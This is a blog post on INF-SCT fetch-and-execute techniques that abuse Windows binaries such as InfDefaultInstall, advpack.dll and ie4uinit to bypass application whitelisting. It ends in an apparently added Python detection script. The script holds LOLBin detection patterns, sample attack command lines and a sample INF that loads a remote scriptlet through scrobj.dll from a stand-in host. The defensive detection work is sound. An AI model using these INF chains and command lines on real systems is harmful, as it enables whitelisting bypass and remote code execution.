Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2)

Two weeks ago, I discussed various 'pass-thru' techniques that use INF files ('.inf') to 'fetch and execute' remote script component files ('.sct'). Generally, these methods could be exploited to circumvent application whitelisting (AWL) policies such as the default AppLocker rules, evade host-based security products, and establish 'hidden' persistence. I also highlighted additional 'fetch and execute' techniques for situational awareness and offered several defensive considerations. If you haven't done so already, I strongly recommend reviewing Part 1 [Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence] before continuing, as we will revisit some earlier topics before introducing these INF-SCT methods:

- InfDefaultInstall
- IExpress
- IEadvpack.dll (LaunchINFSection)
- IE4uinit

Revisiting Setupapi.dll (InstallHinfSection) and Advpack.dll (LaunchINFSection)

Setupapi.dll (InstallHinfSection) – InfDefaultInstall.exe

During their DerbyCon 2017 presentation titled 'Evading AutoRuns,' @KyleHanslovan and @ChrisBisnett from @HuntressLabs showcased several INF-SCT techniques.
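As an added defensive example (my own code, not from this post, Part 1, or the Huntress talk): the INF-SCT methods listed above all pass through a small set of INF-consuming binaries and DLL exports, and the fetch-and-execute step depends on an INF whose [DefaultInstall] section hands a RegisterOCXs/UnRegisterOCXs directive a scrobj.dll entry that points at a remote .sct (the widely documented layout; I treat it as the assumed pattern here). The script flags process command lines that invoke those binaries or exports, pulls the .inf path out of the command line, and parses the INF for that chain. The command lines, both INF files, and the URL are constructed for the example; the argument shapes for ie4uinit.exe and iexpress.exe come from public LOLBAS documentation rather than from this page.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation command lines (not real telemetry). The last
# two are benign controls. ie4uinit/iexpress argument shapes are taken from
# public LOLBAS documentation, not from this page (assumption).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Users\Public\test.inf',
    r'"C:\Windows\System32\rundll32.exe" advpack.dll,LaunchINFSection C:\Users\Public\test.inf,DefaultInstall,1,',
    r'"C:\Windows\System32\rundll32.exe" ieadvpack.dll,LaunchINFSection C:\Users\Public\test.inf,DefaultInstall,1,',
    r'"C:\Windows\System32\InfDefaultInstall.exe" C:\Users\Public\test.inf',
    r'"C:\Windows\System32\ie4uinit.exe" -BaseSettings',
    r'"C:\Windows\System32\iexpress.exe" /N C:\Users\Public\test.sed',
    r'"C:\Windows\System32\notepad.exe" C:\Users\Public\readme.txt',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
]

# Constructed INF showing the assumed UnRegisterOCXs -> scrobj.dll -> .sct
# chain (hypothetical URL).
SAMPLE_INF = r"""
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://example.com/test.sct
"""

# Constructed benign INF: a plain CopyFiles directive, no OCX registration.
BENIGN_INF = r"""
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
CopyFiles=Files.Copy

[Files.Copy]
example.dll
"""

# Label -> regex over the full command line. The advpack.dll pattern uses a
# lookbehind so that ieadvpack.dll is not also reported as advpack.dll.
INF_PASSTHRU_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("setupapi.dll,InstallHinfSection", re.compile(r"setupapi\.dll\s*,\s*InstallHinfSection", re.I)),
    ("advpack.dll,LaunchINFSection", re.compile(r"(?<![a-z])advpack\.dll\s*,\s*LaunchINFSection", re.I)),
    ("ieadvpack.dll,LaunchINFSection", re.compile(r"ieadvpack\.dll\s*,\s*LaunchINFSection", re.I)),
    ("InfDefaultInstall.exe", re.compile(r"InfDefaultInstall\.exe", re.I)),
    ("ie4uinit.exe", re.compile(r"ie4uinit\.exe", re.I)),
    ("iexpress.exe", re.compile(r"iexpress\.exe", re.I)),
]

INF_PATH_RE = re.compile(r'([A-Za-z]:\\[^\s,"]+?\.inf)\b', re.I)


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the labels of every INF pass-thru pattern the command line matches."""
    return [label for label, rx in INF_PASSTHRU_PATTERNS if rx.search(cmdline)]


def extract_inf_path(cmdline: str) -> Optional[str]:
    """First drive-letter path ending in .inf, or None (ie4uinit takes no path:
    it reads its INF from the working directory, so the caller must resolve it)."""
    m = INF_PATH_RE.search(cmdline)
    return m.group(1) if m else None


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Minimal INF reader: {lowercased section name: [non-comment entries]}."""
    sections: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an INF comment
        if not line:
            continue
        m = re.match(r"^\[(.+?)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def find_sct_fetches(text: str) -> List[Tuple[str, str]]:
    """(section, entry) pairs where a RegisterOCXs/UnRegisterOCXs directive leads
    to a scrobj.dll entry carrying a URL or a .sct target."""
    sections = parse_inf(text)
    hits: List[Tuple[str, str]] = []
    for entries in sections.values():
        for entry in entries:
            m = re.match(r"^(?:Un)?RegisterOCXs\s*=\s*(.+)$", entry, re.I)
            if not m:
                continue
            for target in (t.strip().lower() for t in m.group(1).split(",")):
                for ocx in sections.get(target, []):
                    if re.search(r"scrobj\.dll", ocx, re.I) and re.search(r"https?://|\.sct\b", ocx, re.I):
                        hits.append((target, ocx))
    return hits


def triage(cmdlines: List[str], inf_files: Dict[str, str]) -> List[dict]:
    """Join command-line hits with INF content (looked up by path) and report
    which of them carry the remote-SCT chain."""
    findings = []
    for cmd in cmdlines:
        labels = classify_cmdline(cmd)
        if not labels:
            continue
        path = extract_inf_path(cmd)
        sct = find_sct_fetches(inf_files[path]) if path in inf_files else []
        findings.append({"cmdline": cmd, "technique": labels, "inf": path, "sct_fetch": sct})
    return findings


if __name__ == "__main__":
    # Pretend every referenced INF on disk holds SAMPLE_INF.
    for f in triage(SAMPLE_CMDLINES, {r"C:\Users\Public\test.inf": SAMPLE_INF}):
        flag = "REMOTE SCT" if f["sct_fetch"] else "review"
        print(f"[{flag}] {f['technique']} inf={f['inf']} :: {f['cmdline']}")
```

Matching on the DLL export names rather than on rundll32.exe itself means a renamed copy of rundll32 still trips the rule, and the INF check keys on the directive chain rather than on file names, so a renamed .inf or a URL without a .sct extension is still caught as long as scrobj.dll and an http(s) target appear together. Entries that hit a pass-thru binary but carry no INF path (ie4uinit, iexpress) are still reported for manual review, since the INF they consume has to be located on the host.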